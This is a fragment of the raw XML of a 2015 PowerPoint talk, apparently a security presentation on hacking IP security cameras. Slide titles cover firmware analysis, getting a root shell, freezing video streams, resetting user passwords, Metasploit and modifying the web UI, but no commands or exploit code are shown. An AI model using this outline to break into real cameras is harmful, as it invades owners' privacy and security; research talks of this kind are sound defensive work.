            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>logical mistakes in software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Default passwords are bad, but backdoors are worse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Zooming in…</a:t>
            </a:r>
            <a:endParaRPr lang="hu-H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0" t="5249" r="13084" b="11371"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4581585" y="1133077"/>
            <a:ext cx="7291967" cy="6069733"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4167312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Zooming in…</a:t>
            </a:r>
            <a:endParaRPr lang="hu-H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" r="-5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-13648" y="0"/>
            <a:ext cx="13453423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19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381</TotalTime>
  <Words>393</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>92</Paragraphs>
  <Slides>22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Arial</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>DejaVu Sans</vt:lpstr>
      <vt:lpstr>Droid Sans Fallback</vt:lpstr>
      <vt:lpstr>FreeSans</vt:lpstr>
      <vt:lpstr>Liberation Sans</vt:lpstr>
      <vt:lpstr>Liberation Serif</vt:lpstr>
      <vt:lpstr>StarSymbol</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Let's hack security cameras!</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Is it really that easy?</vt:lpstr>
      <vt:lpstr>How my cat hacked IP „security” cameras?</vt:lpstr>
      <vt:lpstr>Where can we attack?</vt:lpstr>
      <vt:lpstr>Zooming in…</vt:lpstr>
      <vt:lpstr>Zooming in…</vt:lpstr>
      <vt:lpstr>Zooming in…</vt:lpstr>
      <vt:lpstr>Zooming in…</vt:lpstr>
      <vt:lpstr>Well, it’s encrypted</vt:lpstr>
      <vt:lpstr>1. Analyzing the firmware</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Everybody loves a root shell...</vt:lpstr>
      <vt:lpstr>Freezing the stream</vt:lpstr>
      <vt:lpstr>Resetting user passwords</vt:lpstr>
      <vt:lpstr>Metasploit</vt:lpstr>
      <vt:lpstr>Nuclear Powerplant Sightseeing</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Modify the webUI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Tamási</dc:creator>
  <cp:lastModifiedBy>Marcell Foti</cp:lastModifiedBy>
  <cp:revision>81</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-08-31T18:01:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-09-16T13:33:11Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/thumbnail.jpeg>
</file>